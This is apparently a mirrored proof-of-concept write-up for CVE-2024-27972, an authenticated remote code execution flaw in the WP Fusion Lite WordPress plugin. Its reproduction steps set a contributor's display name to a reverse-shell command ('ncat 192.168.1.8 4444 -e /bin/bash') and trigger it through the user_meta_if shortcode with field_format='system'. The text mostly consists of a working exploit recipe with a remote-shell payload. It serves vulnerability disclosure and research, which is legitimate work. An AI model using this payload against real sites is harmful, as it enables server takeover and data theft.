Share
## https://sploitus.com/exploit?id=BF642A68-F025-5774-8F05-63EA9FD8F97C
# CVE-2024-27972-Poc
CVE-2024-27972 WP Fusion Lite <= 3.41.24 - Authenticated (Contributor+) Remote Code Execution
https://patchstack.com/database/vulnerability/wp-fusion-lite/wordpress-wp-fusion-lite-plugin-3-41-24-remote-code-execution-rce-vulnerability
File: includes\class-shortcodes.php

Show list field ``` echo var_dump($user_meta = wp_fusion()->user->get_user_meta( $user_id )); ```
call_user_func: https://www.php.net/manual/en/function.call-user-func.php
Short code user_meta_if: https://wpfusion.com/documentation/getting-started/shortcodes/#displaying-content-based-on-user-meta-values
[user_meta_if field="display_name" field_format="system"] Exploit [/user_meta_if]

Steps to Reproduce:
1. Login account Contributor+ and change display name ``` ncat 192.168.1.8 4444 -e /bin/bash ```

2. Create Post and use shortcode ``` [user_meta_if field="display_name" field_format="system"] Exploit [/user_meta_if] ```

Poc:
https://github.com/truonghuuphuc/CVE-2024-27972-Poc/assets/20487674/8c92e910-c95f-41f5-9c9d-051b08c5e242